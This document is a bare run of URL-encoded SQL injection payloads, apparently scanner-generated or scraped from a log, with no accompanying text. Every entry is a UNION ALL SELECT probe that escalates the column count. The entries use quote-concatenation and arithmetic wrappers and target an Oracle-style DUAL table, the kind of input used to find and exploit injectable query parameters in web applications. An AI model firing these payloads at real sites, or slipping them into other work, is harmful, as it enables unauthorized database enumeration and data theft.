-8146%27%20%7C%7C%20%28SELECT%204884%20FROM%20DUAL%20WHERE%203632%3D3632%20UNION%20ALL%20SELECT%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%2C%203632%23%20%29%20%7C%7C%20%27 -2189%27%20%7C%7C%20%28SELECT%207321%20FROM%20DUAL%20WHERE%207114%3D7114%20UNION%20ALL%20SELECT%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%2C%207114%23%20%29%20%7C%7C%20%27 -2435%27%20%7C%7C%20%28SELECT%207402%20FROM%20DUAL%20WHERE%207977%3D7977%20UNION%20ALL%20SELECT%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%23%20%29%20%7C%7C%20%27 -4285%27%20%7C%7C%20%28SELECT%209016%20FROM%20DUAL%20WHERE%207254%3D7254%20UNION%20ALL%20SELECT%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%2C%207254%23%20%29%20%7C%7C%20%27 -8205%27%20%7C%7C%20%28SELECT%207868%20FROM%20DUAL%20WHERE%202311%3D2311%20UNION%20ALL%20SELECT%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%23%20%29%20%7C%7C%20%27 -6647%27%20%7C%7C%20%28SELECT%203869%20FROM%20DUAL%20WHERE%201700%3D1700%20UNION%20ALL%20SELECT%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%2C%201700%23%20%29%20%7C%7C%20%27 -5674%27%20%7C%7C%20%28SELECT%207613%20FROM%20DUAL%20WHERE%204147%3D4147%20UNION%20ALL%20SELECT%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%23%20%29%20%7C%7C%20%27 -8125%27%20%7C%7C%20%28SELECT%206575%20FROM%20DUAL%20WHERE%207667%3D7667%20UNION%20ALL%20SELECT%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%23%20%29%20%7C%7C%20%27 -9926%27%20%7C%7C%20%28SELECT%201894%20WHERE%201511%3D1511%20UNION%20ALL%20SELECT%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%2C%201511%23%20%29%20%7C%7C%20%27 -9894%27%20%7C%7C%20%28SELECT%205930%20WHERE%206069%3D6069%20UNION%20ALL%20SELECT%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%23%20%29%20%7C%7C%20%27 -3942%27%20%7C%7C%20%28SELECT%207397%20WHERE%207807%3D7807%20UNION%20ALL%20SELECT%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%23%20%29%20%7C%7C%20%27 -6014%27%20%7C%7C%20%28SELECT%206192%20WHERE%207711%3D7711%20UNION%20ALL%20SELECT%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%23%20%29%20%7C%7C%20%27 -2531%27%20%7C%7C%20%28SELECT%205906%20WHERE%208178%3D8178%20UNION%20ALL%20SELECT%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%23%20%29%20%7C%7C%20%27 -2206%27%20%7C%7C%20%28SELECT%201046%20WHERE%205980%3D5980%20UNION%20ALL%20SELECT%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%23%20%29%20%7C%7C%20%27 -6785%27%20%7C%7C%20%28SELECT%205511%20WHERE%204078%3D4078%20UNION%20ALL%20SELECT%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%2C%204078%23%20%29%20%7C%7C%20%27 -1556%27%20%7C%7C%20%28SELECT%208684%20WHERE%202931%3D2931%20UNION%20ALL%20SELECT%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%23%20%29%20%7C%7C%20%27 -2354%27%20%7C%7C%20%28SELECT%202562%20WHERE%207353%3D7353%20UNION%20ALL%20SELECT%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%23%20%29%20%7C%7C%20%27 -3793%27%20%7C%7C%20%28SELECT%209527%20WHERE%204992%3D4992%20UNION%20ALL%20SELECT%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%2C%204992%23%20%29%20%7C%7C%20%27 -1328%20%2B%20%28SELECT%206823%20FROM%20DUAL%20WHERE%208399%3D8399%20UNION%20ALL%20SELECT%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%23%20%29 -9017%20%2B%20%28SELECT%208694%20FROM%20DUAL%20WHERE%209773%3D9773%20UNION%20ALL%20SELECT%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%23%20%29 -9524%20%2B%20%28SELECT%208825%20FROM%20DUAL%20WHERE%201525%3D1525%20UNION%20ALL%20SELECT%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%2C%201525%23%20%29 -8901%20%2B%20%28SELECT%206225%20FROM%20DUAL%20WHERE%203688%3D3688%20UNION%20ALL%20SELECT%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%23%20%29 -8849%20%2B%20%28SELECT%209091%20FROM%20DUAL%20WHERE%201893%3D1893%20UNION%20ALL%20SELECT%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%23%20%29 -3126%20%2B%20%28SELECT%209975%20FROM%20DUAL%20WHERE%202205%3D2205%20UNION%20ALL%20SELECT%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%23%20%29 -5960%20%2B%20%28SELECT%204202%20FROM%20DUAL%20WHERE%203038%3D3038%20UNION%20ALL%20SELECT%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%2C%203038%23%20%29 -8596%20%2B%20%28SELECT%204265%20FROM%20DUAL%20WHERE%209549%3D9549%20UNION%20ALL%20SELECT%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%2C%209549%23%20%29 -2748%20%2B%20%28SELECT%202084%20FROM%20DUAL%20WHERE%208346%3D8346%20UNION%20ALL%20SELECT%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%23%20%29 -7239%20%2B%20%28SELECT%209343%20FROM%20DUAL%20WHERE%205351%3D5351%20UNION%20ALL%20SELECT%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%2C%205351%23%20%29 -2980%20%2B%20%28SELECT%209566%20WHERE%207584%3D7584%20UNION%20ALL%20SELECT%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%2C%207584%23%20%29 -8265%20%2B%20%28SELECT%201333%20WHERE%205080%3D5080%20UNION%20ALL%20SELECT%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%23%20%29 -6921%20%2B%20%28SELECT%203978%20WHERE%209337%3D9337%20UNION%20ALL%20SELECT%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%23%20%29 -1279%20%2B%20%28SELECT%202911%20WHERE%201971%3D1971%20UNION%20ALL%20SELECT%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%2C%201971%23%20%29 -6539%20%2B%20%28SELECT%201400%20WHERE%203071%3D3071%20UNION%20ALL%20SELECT%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%2C%203071%23%20%29 -1279%20%2B%20%28SELECT%208538%20WHERE%206527%3D6527%20UNION%20ALL%20SELECT%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%23%20%29 -5168%20%2B%20%28SELECT%204044%20WHERE%201148%3D1148%20UNION%20ALL%20SELECT%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%23%20%29 -6280%20%2B%20%28SELECT%209897%20WHERE%206618%3D6618%20UNION%20ALL%20SELECT%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%2C%206618%23%20%29 -4980%20%2B%20%28SELECT%207485%20WHERE%203956%3D3956%20UNION%20ALL%20SELECT%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%23%20%29 -5694%20%2B%20%28SELECT%208041%20WHERE%206873%3D6873%20UNION%20ALL%20SELECT%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%2C%206873%23%20%29 -9102%27%20%2B%20%28SELECT%20%27vMfA%27%20FROM%20DUAL%20WHERE%203451%3D3451%20UNION%20ALL%20SELECT%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%2C%203451%23%20%29%20%2B%20%27 -4342%27%20%2B%20%28SELECT%20%27BWcV%27%20FROM%20DUAL%20WHERE%206571%3D6571%20UNION%20ALL%20SELECT%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%23%20%29%20%2B%20%27 -3979%27%20%2B%20%28SELECT%20%27stOB%27%20FROM%20DUAL%20WHERE%206524%3D6524%20UNION%20ALL%20SELECT%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%23%20%29%20%2B%20%27 -1017%27%20%2B%20%28SELECT%20%27BHUg%27%20FROM%20DUAL%20WHERE%208774%3D8774%20UNION%20ALL%20SELECT%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%23%20%29%20%2B%20%27 -1066%27%20%2B%20%28SELECT%20%27yvgw%27%20FROM%20DUAL%20WHERE%203618%3D3618%20UNION%20ALL%20SELECT%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%23%20%29%20%2B%20%27 -7050%27%20%2B%20%28SELECT%20%27kYKI%27%20FROM%20DUAL%20WHERE%206667%3D6667%20UNION%20ALL%20SELECT%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%23%20%29%20%2B%20%27 -1778%27%20%2B%20%28SELECT%20%27kdor%27%20FROM%20DUAL%20WHERE%201836%3D1836%20UNION%20ALL%20SELECT%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%2C%201836%23%20%29%20%2B%20%27 -5814%27%20%2B%20%28SELECT%20%27XKiC%27%20FROM%20DUAL%20WHERE%201069%3D1069%20UNION%20ALL%20SELECT%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%2C%201069%23%20%29%20%2B%20%27 -9120%27%20%2B%20%28SELECT%20%27BGtq%27%20FROM%20DUAL%20WHERE%205681%3D5681%20UNION%20ALL%20SELECT%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%23%20%29%20%2B%20%27 -6879%27%20%2B%20%28SELECT%20%27YTkR%27%20FROM%20DUAL%20WHERE%208401%3D8401%20UNION%20ALL%20SELECT%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%2C%208401%23%20%29%20%2B%20%27 -4519%27%20%2B%20%28SELECT%20%27NzQt%27%20WHERE%209579%3D9579%20UNION%20ALL%20SELECT%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%23%20%29%20%2B%20%27 -3897%27%20%2B%20%28SELECT%20%27BZTQ%27%20WHERE%202345%3D2345%20UNION%20ALL%20SELECT%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%2C%202345%23%20%29%20%2B%20%27 -9271%27%20%2B%20%28SELECT%20%27UXyq%27%20WHERE%201999%3D1999%20UNION%20ALL%20SELECT%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%23%20%29%20%2B%20%27 -5088%27%20%2B%20%28SELECT%20%27xqyA%27%20WHERE%208016%3D8016%20UNION%20ALL%20SELECT%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%2C%208016%23%20%29%20%2B%20%27 -9496%27%20%2B%20%28SELECT%20%27IDlv%27%20WHERE%207497%3D7497%20UNION%20ALL%20SELECT%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%2C%207497%23%20%29%20%2B%20%27 